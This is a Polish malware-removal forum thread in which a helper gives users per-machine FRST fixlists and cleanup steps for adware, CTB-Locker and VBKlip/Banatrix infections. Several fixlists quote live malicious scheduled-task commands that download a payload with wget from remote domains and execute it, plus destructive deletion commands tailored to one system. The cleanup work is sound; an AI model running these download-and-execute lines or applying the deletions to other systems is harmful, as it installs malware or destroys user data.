systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Przejdź w Tryb awaryjny Windows. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart, opuść Tryb awaryjny. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Przez Panel sterowania odinstaluj zbędnik Akamai NetSession Interface. 3. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Reprofiler tylko pomaga przekierować konto na poprzednią ścieżkę (wykonując bazowy reset ACL), ale nie naprawia innych usterek źródłowych, które doprowadziły do odrzucenia konta, np. rejestr lub któryś subfolder konta może być po prostu uszkodzony. Uszkodzone elementy nie zostaną załadowane. W pierwszym FRST Addition jest komplet danych, tzn. określone błędy z Dziennika zdarzeń sugerujące, że przekierowanie Reprofiler może być nieskuteczne: 1. Przyczyna odrzucenia konta: Error: (02/06/2015 02:45:32 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1508) (User: ZARZĄDZANIE NT) Description: System Windows nie może załadować rejestru. Częstą przyczyną tego problemu jest za mała ilość pamięci lub brak wystarczających praw zabezpieczeń. SZCZEGÓŁY - Operacja We/Wy zainicjowana przez rejestr nie powiodła się w sposób nieodwracalny. Rejestr nie może wczytać, wypisać lub opróżnić jednego z plików zawierających obraz rejestru systemu. for C:\Users\Stach\ntuser.dat Reprofiler przywrócił wprawdzie poprzednią ścieżkę, ale i tak konto nie jest sprawne. Konto na ubój, tzn. należy założyć nowe i ze starej ścieżki przekopiować tylko istotne dane. Ale: 2. Źródło problemu to bad sektory dysku: System errors: ============= Error: (02/06/2015 03:05:57 PM) (Source: Disk) (EventID: 7) (User: ) Description: W urządzeniu \Device\Harddisk0\DR0 wystąpił zły blok. Temat przenoszę do działu Hardware na diagnostykę. Dostarcz informacje wymagane działem: KLIK. Od razu zabezpiecz cenne dane na nośniku zewnętrznym.

Infekcja jest czynna, uruchamia się za pomocą Harmonogramu zadań plik z katalogu tymczasowego. Pierwsza faza to będzie usunięcie infekcji. Druga faza to wyrzucenie zaszyfrowanych plików. Działania wstępne: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: Task: C:\WINDOWS\Tasks\At1.job => C:\DOCUME~1\irena\DANEAP~1\FoxTab\UPDATE~1\UPDATE~1.EXE Task: C:\WINDOWS\Tasks\cxoqoka.job => C:\DOCUME~1\irena\USTAWI~1\Temp\geydprm.exe HKLM\...\Run: [ConvertAd] => C:\Documents and Settings\irena\Ustawienia lokalne\Dane aplikacji\ConvertAd\ConvertAd.exe HKLM\...\Run: [mobilegeni daemon] => C:\Program Files\Mobogenie\DaemonProcess.exe C:\Documents and Settings\All Users\Menu Start\Programy\Avira\AntiVir Desktop\Display readme.lnk C:\Documents and Settings\All Users\Dane aplikacji\vkdvkyc.html C:\Documents and Settings\irena\Moje dokumenty\!Decrypt-All-Files-scqwxua.bmp C:\Documents and Settings\irena\Moje dokumenty\!Decrypt-All-Files-scqwxua.txt C:\Program Files\mozilla firefox\plugins Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ConvertAd /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Tapeta jest podstawiona plikiem infekcji: ==================== Other Registry Areas ===================== HKU\S-1-5-21-746137067-261478967-682003330-1003\Control Panel\Desktop\\Wallpaper -> C:\Documents and Settings\irena\Moje dokumenty\!Decrypt-All-Files-scqwxua.bmp W skrypcie usuwam plik tapety, to spowoduje pojawienie się pustego ekranu. Należy ręcznie zmienić tapetę wskazując jakiś plik, który nie został zaszyfrowany. 3. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt.

Dla poprzedniego komputera: oczywiście czekam na fixlog z ostatniej akcji, a po sprawdzeniu podam końcowe kroki. Drugi komputer: ta sama infekcja, tylko mniej zadań w Harmonogramie. Akcje do przeprowadzenia: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {2B0FCD48-6531-4E36-89FA-214F118F1445} - System32\Tasks\{F11B7F52-71B1-40A5-B2D0-7E2A96AD8C9E} => pcalua.exe -a C:\Users\Proteus\Downloads\Huawei_Drivers_v4.25.11.00\Driver\DriverSetup.exe -d C:\Users\Proteus\Downloads\Huawei_Drivers_v4.25.11.00\Driver Task: {8C97B981-9056-421B-A12D-7C43087905C6} - System32\Tasks\{07CD315F-8D34-4281-AC9E-4CEFE4534D41} => pcalua.exe -a "C:\Program Files (x86)\PLAY ONLINE\uninst.exe" Task: {8F39E590-088F-4A09-95CC-41AD1FDCBEC1} - System32\Tasks\{61BD271E-EF2E-4AC1-8FD9-3097ABF7B4DA} => pcalua.exe -a "C:\Program Files\AVAST Software\Avast\aswRunDll.exe" -c "C:\Program Files\AVAST Software\Avast\Setup\setiface.dll" RunSetup Task: {BA832787-7A2E-46E3-8854-CB91F631F134} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=embX3iyw8R;camtasia.exe;1422474927 & start cmd /R dat.bmp Task: {C99679AE-306B-4F01-927D-DA1BFF564E10} - System32\Tasks\{2C909A96-50CC-46F5-AA7E-7AD6831ED2EC} => pcalua.exe -a C:\ProgramData\LGMOBILEAX\LGMLauncher.exe -d C:\ProgramData\LGMOBILEAX CustomCLSID: HKU\S-1-5-21-2603393732-3475753062-4034012456-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll No File HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\...\Run: [Akamai NetSession Interface] => "C:\Users\Proteus\AppData\Local\Akamai\netsession_win.exe" ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie SearchScopes: HKU\S-1-5-21-2603393732-3475753062-4034012456-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.com/search?q={sear SearchScopes: HKU\S-1-5-21-2603393732-3475753062-4034012456-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = FF HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\...\Firefox\Extensions: [{B64D9B05-48E1-4CEB-BF58-E0643994E900}] - C:\Program Files (x86)\Common Files\DVDVideoSoft\plugins\ff CHR DefaultSuggestURL: Default -> http://ssmsp.ask.com/query?sstype=prefix&li=ff&q={searchTerms} S3 cpuz130; \??\C:\Users\Proteus\AppData\Local\Temp\cpuz130\cpuz_x64.sys [X] S3 cpuz137; \??\C:\Windows\TEMP\cpuz137\cpuz137_x64.sys [X] S3 ew_hwusbdev; system32\DRIVERS\ew_hwusbdev.sys [X] S3 ew_usbenumfilter; system32\DRIVERS\ew_usbenumfilter.sys [X] S3 GPUZ; \??\C:\Windows\TEMP\GPUZ.sys [X] S3 huawei_cdcacm; system32\DRIVERS\ew_jucdcacm.sys [X] S3 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X] S3 huawei_ext_ctrl; system32\DRIVERS\ew_juextctrl.sys [X] S3 huawei_wwanecm; system32\DRIVERS\ew_juwwanecm.sys [X] S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X] C:\Program Files (x86)\GUT73DA.tmp C:\ProgramData\TEMP C:\Users\Proteus\Downloads\M-Kernel_*.zip C:\Users\Proteus\Downloads\sh-remover.exe CMD: del /q C:\ProgramData\*.* Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj / Odśwież program Firefox. 3. Zrób nowy log FRST z opcji Scan, zaznacz Addition, ale nie Shortcut. Dołącz też plik fixlog.txt.

Delfix wykonał zadanie, możesz skasować z dysku plik C:\Delfix.txt. Chodzi o odinstalowanie przez Panel sterowania starych wersji Java 7 Update 45 + Java 7 Update 51 (64-bit) . Następnie (o ile Java w ogóle potrzebna), instalujesz z linka podanego w przyklejonym odpowiednią najnowszą wersję.

Na temat używania ComboFix: KLIK. Log wynikowy już zostaw, by było wiadome co mieszał. Jego uruchomienie było zupełnie niepotrzebne. Dostosuj się do zasad działu i dostarcz obowiązkowe logi FRST + GMER: KLIK.

Nie prosiłam o nowe logi FRST (usuwam), na tym etapie tylko fixlog mi był potrzebny. Jeśli nie wymieniam konkretnej akcji, to znaczy że nie jest potrzebna. Ostatnia poprawka na szczątki Google Chrome development ciągle walające się w rejestrze. Otwórz Notatnik i wklej w nim: Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D} /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96} /f Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Pokaż wynikowy fixlog.txt.

Opcje "Drivers MD5" i "List BCD" nie miały być zaznaczone dio skanu FRST. Fixy wykonane. Idziemy dalej: Uruchom AdwCleaner. Na początek wybierz tylko opcję Szukaj (nie stosuj jeszcze Usuń) i dostarcz log z folderu C:\AdwCleaner. Chodzi o najnowszą wersję AdwCleaner podaną w przyklejonym, w logu FRST są ślady używania jakiejś archaicznej, która umieszczała pliki raportów luzem w root dysku.

Aj, w międzyczasie próbowałeś YAC (Yet Another Cleaner) - to podejrzany wątpliwy skaner: KLIK. Kolejne poprawki: Otwórz Notatnik i wklej w nim: S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\NPE RemoveDirectory: C:\Users\Proteus\AppData\Local\NPE RemoveDirectory: C:\Users\Proteus\Desktop\Stare dane programu Firefox RemoveDirectory: C:\Windows\system32\log CMD: del /q C:\ProgramData\*.* CMD: del /q C:\Users\Proteus\Downloads\yet_another_cleaner_sk_6111391.exe Reg: reg query HKLM\SOFTWARE\Google\Update\ClientState /s Reg: reg query HKLM\SOFTWARE\Wow6432Node\Google\Update\ClientState /s Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Pokaż wynikowy fixlog.txt. Gdy skończymy z tym komputerem, podasz pełny zestaw logów z tego drugiego.

Co z usuwaniem kwarantanny FRST? Gdy to się uda, zastosuj jeszcze DelFix i wyczyść foldery Przywracania systemu: KLIK.

Dodatkowe kroki: 1. Zastosuj DelFix. 2. Sugeruję odinstalować zbędnik AVG Web TuneUp (to taki firmowy "PUP"). Po tym w Google Chrome zweryfikuj czy wszystkie przekierowania mysearch.avg.com ustąpiły z wyszukiwarki i stron startowych. 3. Na wszelki wypadek zrób jeszcze dodatkowe skany za pomocą: ESET Online Scanner, Hitman Pro, Malwarebytes Anti-Malware. Jeśli coś znajdą, dostarcz raporty.

Temat przenoszę do działu Windows. To nie jest problem infekcji. Używałeś ComboFix, niepotrzebnie. Ogólnie na ten temat: KLIK. 1. Są w Dzienniku zdarzeń błędy opowiadające o opóźnieniu odpowiedzi z kontrolera dysku: Error: (02/05/2015 08:21:08 AM) (Source: iaStor) (EventID: 9) (User: ) Description: Urządzenie \Device\Ide\iaStor0 nie odpowiedziało w ramach ustalonego limitu czasu. To może być problem z obniżeniem transferu dysku z DMA do PIO. Na wszelki wypadek sprawdź wątek Skutki uboczne skanu GMER (dyski w trybie IDE, głównie system XP): KLIK. 2. Możliwości zamulenia na poziomie software to np. Avast, mówisz że jest zdefektowany. To stara wersja 9.0.2021 (aktualna to 2015.10.0.2208). Odinstaluj program całkowicie i sprawdź czy są jakieś zmiany. 3. Może tu być także problem czysto sprzętowy, np. problem z dyskiem twardym. Diagnostyka pod tym kątem: KLIK. Konto hoshi jest uszkodzone, system nie jest w stanie załadować gałęzi klas rejestru: Application errors: ================== Error: (02/05/2015 10:30:16 AM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1542) (User: ZARZĄDZANIE NT) Description: System Windows nie może załadować pliku rejestru klas. SZCZEGÓŁY — Nie można odnaleźć określonego pliku. Załóż nowe konto, a ze starego potem przekopiujesz dane. Dziennik zdarzeń sugeruje, że powiązana usługa jest po prostu wyłączona: System errors: ============= Error: (02/05/2015 10:22:23 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Kopiowanie woluminów w tle z powodu następującego błędu: %%1053 Error: (02/05/2015 10:22:23 AM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą Kopiowanie woluminów w tle. Start > w polu szukania wpisz services.msc > z prawokliku Uruchom jako Administrator> dwuklik w usługę Kopiowanie woluminów w tle i Typ uruchomienia ustaw na Ręczny. Jakie konkretnie problemy? W Dzienniku są wprawdzie błędy usługi Avast, ale błędy sugerują wyłączoną usługę, log FRST tego nie potwierdza (wszystkie obiekty Avast na chodzie). System errors: ============= Error: (02/05/2015 08:25:51 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi avast! Antivirus z powodu następującego błędu: %%1053 Error: (02/05/2015 08:25:51 AM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą avast! Antivirus. PS. Gdy już się uporasz z powyższymi, doczyść sobie śmieciarskie wpisy (nie związane z kontem hoshi). W spoilerze instrukcja. To nie ma żadnego związku z powyższym problemem.

Ten odczyt z Wallpaper w Addition to chyba jakieś zaburzenia FRST. Nawiasem mówiąc, tam było od początku JPG w ścieżce, to jest ścieżka w rejestrze a nie na dysku. Ścieżka na dysku była w pliku Search. Wszystko wykonane. Dotychczas było usuwanie zaszyfrowanych kopii z dysku C (funkcja Search FRST jest ograniczona tylko do systemowego). Jest tu jednak też partycja D. Co na niej jest (czy typ danych obejmowanych szyfrowaniem CTB-Locker), czy tam też są zaszyfrowane wtręty? Potwierdź, a wtedy będziesz mógł wykonać kolejny fixlist.txt do FRST o zawartości: CMD: rd /s /q D:\$Recycle.Bin CMD: del /q /s D:\*pogkqql*

AdwCleaner tu nie pomoże, to nie jest adware. To jest infekcja typu VBKlip/Banatrix ładowana za pomocą Harmonogramu zadań: Task: {49ACE010-577E-4A92-BC37-A396BD06DD3C} - System32\Tasks\SYSTEMDOWN => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://sdshdb.nl/index.php?data=XhyuslHf2k;up;1421852599 & start cmd /R dat.bmp Task: {52BD9ED5-BE48-4C77-B61E-69F2B29FA155} - System32\Tasks\SYSTEMUP => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://iashdb.in/index.php?data=iUbbj8phSd;up;1421852589 & start cmd /R dat.bmp Task: {7DCC40B8-FC2C-4903-8585-D5A44E56A190} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=9a9CS535Ou;camtasia.exe;1421836212 & start cmd /R dat.bmp Ale są tu też konsekwencje pobytu adware. Adware nadal jest obecne w różnych miejscach (np. aplikacja "Grammarly Lite Smart Spellchecker"). Ponadto, cała przeglądarka Google Chrome została przekonwertowana przez adware z wersji stabilnej do developerskiej i jest wymagana jej reinstalacja. Wdróż następujące działania: 1. Przez Panel sterowania odinstaluj adware, poszkodowaną przeglądarkę i stare wersje: Adobe Reader X (10.1.9) , Adobe Shockwave Player 12.0, Grammarly Lite Smart Spellchecker, Google Chrome, Java 7 Update 17. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {49ACE010-577E-4A92-BC37-A396BD06DD3C} - System32\Tasks\SYSTEMDOWN => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://sdshdb.nl/index.php?data=XhyuslHf2k;up;1421852599 & start cmd /R dat.bmp Task: {52BD9ED5-BE48-4C77-B61E-69F2B29FA155} - System32\Tasks\SYSTEMUP => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://iashdb.in/index.php?data=iUbbj8phSd;up;1421852589 & start cmd /R dat.bmp Task: {7A0BED88-1594-4021-8842-72AD25A9A43B} - System32\Tasks\{1C57B201-D7B9-445A-90ED-7F1E2614E4A6} => pcalua.exe -a C:\Users\Proteus\AppData\Roaming\awesomehp\UninstallManager.exe Task: {7DCC40B8-FC2C-4903-8585-D5A44E56A190} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=9a9CS535Ou;camtasia.exe;1421836212 & start cmd /R dat.bmp Task: {70055F6B-23A1-442B-86EC-6D69DFADECC6} - System32\Tasks\EasyPartitionManager => C:\Windows\MSetup\BA46-12225A02\EPM.exe Startup: C:\Users\Proteus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M-Kernel_a69.zip.lnk S3 cpuz130; \??\C:\Users\Proteus\AppData\Local\Temp\cpuz130\cpuz_x64.sys [X] S3 cpuz135; \??\C:\windows\TEMP\cpuz135\cpuz135_x64.sys [X] HKLM-x32\...\Run: [fst_pl_81] => [X] HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [Andy] => C:\Program Files\Andy\HandyAndy.exe HKLM\...\Policies\Explorer: [NoControlPanel] 0 HKU\S-1-5-21-1866740971-3537411966-2138577161-1001\...\Run: [] => [X] ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.wp.pl/?src01=dp220141121 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com HKU\S-1-5-21-1866740971-3537411966-2138577161-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.symantec.com/redirects/security_response/fix_homepage/index.jsp?lg=en&pid=NIS&pvid=21.5.0.19 HKU\S-1-5-21-1866740971-3537411966-2138577161-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie SearchScopes: HKU\S-1-5-21-1866740971-3537411966-2138577161-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-1866740971-3537411966-2138577161-1001 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.com/search?q={sear FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.) FF Plugin HKU\S-1-5-21-1866740971-3537411966-2138577161-1001: @tools.google.com/Google Update;version=3 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.) FF Plugin HKU\S-1-5-21-1866740971-3537411966-2138577161-1001: @tools.google.com/Google Update;version=9 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.) CustomCLSID: HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File C:\ProgramData\*.* C:\ProgramData\{1b30cb05-82b9-9e5a-1b30-0cb0582b2c16} C:\ProgramData\{d0a5e402-7f84-7b8f-d0a5-5e4027f89009} C:\ProgramData\{d0a5e402-7f84-7b8f-d0a5-5e4027f89009} C:\ProgramData\Temp C:\Users\Proteus\AppData\Local\Google\Chrome C:\Users\Proteus\Desktop\FOLDERY\PROGRAMY\Samsung Kies.lnk C:\Users\Proteus\Downloads\*(*)-dp*.exe C:\windows\SysWOW64\AMD64 C:\windows\SysWOW64\X86 Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete HKCU\Software\Google\Chrome /f Reg: reg delete HKLM\SOFTWARE\Google\Chrome /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google\Chrome /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f CMD: sc config "PLAY ONLINE. RunOuc" start= disabled EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj / Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone, ale używane rozszerzenia trzeba będzie przeinstalować. 4. Napraw uszkodzony specjalny skrót IE. W pasku adresów eksploratora wklej ścieżkę i ENTER: C:\Users\Proteus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 5. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt.

Usunąłeś poprawne niewybrakowane wpisy: ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Jarek\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll (Dropbox, Inc.) BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation) BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> c:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated) R2 DCService.exe; C:\ProgramData\DatacardService\DCService.exe [229376 2010-08-19] () [File not signed] R2 UI Assistant Service; C:\Program Files (x86)\PLAY ONLINE\AssistantServices.exe [260976 2011-05-31] () S3 TVICHW32; C:\Windows\system32\DRIVERS\TVICHW32.SYS [21200 2013-11-25] (EnTech Taiwan) S3 TVICHW32; C:\Windows\SysWOW64\DRIVERS\TVICHW32.SYS [29536 2013-11-25] (EnTech Taiwan) Niektóre szkody nieistotne (będzie i tak deinstalacja określonych rzeczy), Dropboxa przeinstalujesz, usunięte usługi zaś będą rekonstruowane z kopii zapasowej FRST. Dodatkowa uwaga: skoro usuwasz w całości klucze MozillaPlugins, to nie ma sensu przetwarzać wpisów typu "FF Plugin" kierujących w to miejsce, bo i tak zostaną usunięte. Próbowałeś też przetwarzać poprawne adresy DNS UPC. To się i tak nie wykonało, bo nie jest sensowne. To wartość dynamiczna pobierana z routera, nie da się jej zmodyfikować na stałe z poziomu Windows, i tak będzie przywracana z routera: Tcpip\Parameters: [DhcpNameServer] 62.179.1.62 62.179.1.63 W mojej mocy są tylko poprawki, zaszyfrowanych danych niestety nie ma jak odzyskać. Do usunięcia będą szczątki adware i programów, artefakty wstawione przez ComboFix (np. martwa usługa AppMgmt nie występująca na edycjach Home), pliki pomocnicze CTB-Locker oraz zaszyfrowane dane (to krok na potem). 1. Deinstalacje: - Przez Panel sterowania odinstaluj stare wersje Adobe Reader X MUI, Adobe Shockwave Player 12.0, Java™ 7 Update 1 (64-bit), Java™ 7 Update 1 oraz zbędnik przypuszczanie instalowany nieintencjonalnie Smart File Advisor. - Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście po kolei odpadkowe wpisy Update Installer for WildTangent Games App, WildTangent Games App > Dalej. - Start > w polu szukania wklep devmgmt.msc > z prawokliku Uruchom jako Administrator. Wyszukaj pozycję avast! Firewall NDIS Filter Miniport, odinstaluj i zresetuj system. 2. Otwórz Notatnik i wklej w nim: U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation) R1 avgtp; C:\Windows\system32\drivers\avgtpx64.sys [45856 2013-08-22] (AVG Technologies) S4 GamesAppService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe" [X] CHR HKLM\SOFTWARE\Policies\Google: Policy restriction CHR HKU\S-1-5-21-2876413115-476791588-3789803701-1000\SOFTWARE\Policies\Google: Policy restriction HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction Task: {24504EEB-9805-4081-99F6-9FAC96018FD3} - System32\Tasks\{363F7A12-B195-4882-A45E-0177088DD5F1} => pcalua.exe -a D:\blueconnect\Setup.exe -d D:\blueconnect Task: {E9D2EEFD-3FF2-43C5-8865-E7A6D874A797} - System32\Tasks\Go for FilesUpdate => C:\Program Files (x86)\GoforFiles\GFFUpdater.exe Task: {F2AA8173-817D-403D-BCE2-9ACBB457BB58} - \AdobeFlashPlayerUpdate No Task File Task: {F560B843-4495-47C1-955B-F47D5339CA85} - \AdobeFlashPlayerUpdate 2 No Task File Task: {FC035E5E-4222-49D5-83C0-ABC03029922C} - \dpcewba No Task File HKU\S-1-5-21-2876413115-476791588-3789803701-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch C:\Program Files\Enigma Software Group C:\Program Files\Google C:\Program Files\Java C:\Program Files (x86)\Common Files\Java C:\Program Files (x86)\Common Files\McAfee C:\Program Files (x86)\IsaVeer C:\Program Files (x86)\Java C:\Program Files (x86)\Mozilla Firefox C:\Program Files (x86)\Temp C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69 C:\ProgramData\3872871776 C:\ProgramData\50Cuoupons C:\ProgramData\7875723679439a5a C:\ProgramData\8679969435114773082 C:\ProgramData\AnySend C:\ProgramData\AVAST Software C:\ProgramData\c406ba16000042c6 